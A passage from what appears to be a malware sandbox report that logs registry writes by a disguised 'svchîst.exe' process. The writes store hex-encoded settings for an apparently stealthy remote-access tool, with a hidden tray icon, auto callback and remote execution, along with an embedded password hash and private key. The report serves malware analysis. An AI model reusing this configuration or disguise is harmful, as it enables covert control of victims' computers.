c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00 C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e747275653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e66616c73653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223639313130223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c46556d5646566d7471515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c4a484f58525a563278315355633161474a585657646a4d3278365a45645764456c49546d786a626c70775933704661553144515564424d5656465158643357677053527a6c305756647364556c484e5768695631566e597a4e73656d5248566e524a534535735932356163474e3651575647647a4235545770424d45317159336c4e56456b7a5458706f59555a334d48704e616b4577436b317155586c4e56456b7a5458706f5955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73525749794d576868567a526e596d314764467054516e6f4b5a56684f4d4670584d47646a4d6c5a355a473173656b31545358644a51566c45566c465252455243624556694d6a466f595663305a324a74526e526155304a365a56684f4d4670584d47646a4d6c5a355a4731736567704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a30744451564646515842794d6e647553445643623064454e32706e55585a7265566b34436a56464d303533595568335a56466b5630464e614442524c3074774e575a5563553569635731774e6d5678525656595446704e5546706f5447747153557074563152484d5652585a6b527063574d76576d6b335644414b6133647951553956564764446332316c62546b725531424b6555397551304a74576c706a61475245636d527052324a544d6b685554444a43643159765255527862574e6952304a79556d64585a6b644d6454557862517036535570436154523652486854554749304f584e4d62575a6b5558673261334e7552574a68595539305a7a6c4b4d6d3930626e6779645463314d6a4e495233633553334d765a33526d556b4e7757456c7859323169436b394a596c4e775546566d63567078614564705a3159795130397353566c4f536d733352433876535452315a6c4e4d54444e6859326c705a6d7871546b4a53596b4e335a48565365457478563159334f5456526545734b646a4d78646e6852636d354354476c6e636e5656656a4e444e444e595a6a41794e306c5152564e79563256585647353555307469616a424361304644614846445355303454474e6f4d48426854475a4b64304d785251703364306c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b465251566b7862474657636a467765554e6c5254683153554a425557644c636d4d305645464461444e6f436a4634513345764d325a786147645a59314e4b59304a454d6a4a515a69744a6347785665444630574770565347527a5647706e63573169646a4e6f516c64705233644b614442465630744c54314a50596e4231566e594b61455a6d5647465855544a42556b70334d5552595232746d566d566e544452724d557843645456556545467252555531625539694d6c6c71626e55314f556c51654852534f433835656d5a58613168545a464a435377705a5757317353455a4359335643546a686161304a45526c4e4763555132646e4d795a3370455a304655556c566b655845354d7a6c345a6e6c484e33567853554e5a4f455a565a5863764f466851616b6f3262556334436e4e7951555654576c49315a316c71616b313459574e7654453835533364746357703255555a4d5658647255334d72635568454d6c4e574d6b46326233564e4e565652615670474d3346754d573031526d4e504c32454b4d3239764f484e705532706b4f565a704c335a436331685263464e704d6c4a4e4f574a6e63476333636b59764e7a684a59314234613370485958426e4e444650546b686a5a476f786156594b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a5355563264306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b74726432646e553278425a3056425157394a516b465251323132596b4e6a5a6d74485a316c516455384b516b4d7256457071656d7455597a4e4362325a434e5549785755463553464a454f48467562446c50627a46316357467563445a76556c4a6a644774334f57314664564e4e5a323161576b3169566b35614f45394c634170364f57314d6446425456454e7a515456535430464c65566f32596a4d315354687553545a6a5355646162477835526a425064444a4a576e524d5757524e646c6c49516c673455553978576e687a5755643052304a61436a685a6454647556324a4e5a3274485447704e55455a4a4f585a714d6e6431576a6b785245687855336c6a556e5277627a59795244427559576b795a6b68684e335a75596d4e6a596b517763586f72517a45355255734b62474e7063486c61637a526f644574724f564972634731785257464c516c685a53545a56614763776256527a55433834616d6b314f556c7a646d52776555744b4b31644e4d455a47633078434d6a56495258467757677059646a4e73524556784c325a584c305a4464574e46645574446454565555474e4d616d526b4c31526963326334556b7430576a566154325a4b53584231554646485555464c5232394a5a33703364486c4955327876436e5134626b464d565652455157644e516b464252554e6e5a30564351556f355557563552484a58576c5135566c4978595652765331466b53473549516c4e4f55484e564e564e6d5a7938355a444a724f48644c6557674b5269733451314e6f4d304e70656b6b316444553264484675563359786558426a4d56566f637a564e616a51325a6d784c55314a6c4f574a45626d466c5a453872556c5279536d4a686555354d4d557450567a52334f517052546d747a56445a445756706d596d64474c30564f62444d3452464a30576d643552574a77636a4a6d5657704a54576f77566d74516156707a4e577461636d566e62574e7657475934566a4a694d3264745a564a4b436a5a74566d49305745747a6443397062304636516e42774e5442555a6d4a3453317051526c4230595655346357643061546c36626e64774d48704b4e58703653304e76565731534f565a4f6332356e637939755532384b535468434e4764305a31677a56484d31636b7433543352484e486473596b5a5854305a364d464235525735455a32396f61575a4461453833615764436448703056546c4562466472597a52524f45706f4f4568464f416f325a476c614d6d6378526d5a46516c646964575647646e68314f545231654546585a6d314c516e5a57555567775654564356456b7763565a465132645a5255457a516e55335132513253557870617a64474e453178436a5246566c6f7255574a5856585a7561556c6e64564631526e41785a4767316433706f516c646864444671554446466232467a5458467a5744565763474e45624468614e4574364d5574615630524464586c455a48674b59585a445a3059304f464e7a597a41794d6e4a48576b7474543341326333424c4f553931517a6c6a554563304f487054556d685961576c365755704a647a637656565230595664744b305130525868355469394a62516f72616b55334d6e46534e314e3064446b77655764784f5767794f53394464327042634442445a316c465158646c4e48524b636d64705a5735446232493452335a6e547a51335747746e6445707553565650536d316c436b357455334a4f65475648646a5a544d6d785462336c364d6a55795745746e63455a4a4e573143576c633052476452656e6f3163307448566b356b4e6d52615130457754476c32526a4e346430524265586478556a514b55455a324e3146334f486c6862584a4f4e6b6c495a48466b63315a4f4e57527a515739484f466c42564574344c324a4d59546c6863573142646b5a7152446830596b314a61314578636a4a6a56584a495a574a6f6377705a4d3246364e3349335a5778304f454e6e57554a71643068745333427565473547655455356230646b5a45527552564a4b4b3156594e4468474d555a75537a49325a5546554f46465952577068616e4e6a4d334a5a436b7070635338764f4656765a6c6b7a536b396b64546849576d706c616e4231533164554d3030315648565659306c79546c46754d454a6a57464a796447784e627a4d3555564530557a684b555735686457524f556a6b4b556e4e56516b64465a6a6850564759304d6b6c4a616c4e575a6c4661626e564a64573535526b64466545777854317042566a52354f4868354e6b59355454464d616e59775969394f517a6c45555574435a31464455676f79556d464d4f4549724b304a6a6432356e53484e475a454e5861556477575746504b30644b564463334d5564595245737861445931545841344b314132576b633263314e4b62584d3253324a354d6a644f5756706c436e6845634652425244643353464678593039724f474a4f5458426e4f454e61535745765a4545724e454e5363456831636c4d78635668515a335a3064564179525574525a326f33646c64465646497a6253744d5432384b4c7a5a78644649316554464554315a6b55456c61624578514d4739356447686b5179746f536c64795348426c4c314e48633168586244685253304a6e555552614f544a6964575a516132464e636d706a65586c575967703051327836556c4a49596b513456334a4c536d307752476c4f655374455544684a656d7057516a52304c31566f623051325332743053545247656d6c3061544253596c4a6e6347777764554649557a4e59616b5a42436b70685a4652736545354a656e4669655531714f47644d4e6b744a5255314d516d39454b304e33597a56796356646d53336c7254456c6d4d586461536c4532557a5a6c565774795a6a684663445273527a46305647734b575442725a55315a624468365a6e6776645656744f454a736331705754304e695955453950516f744c5330744c55564f52434251556b6c575156524649457446575330744c53307443673d3d3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
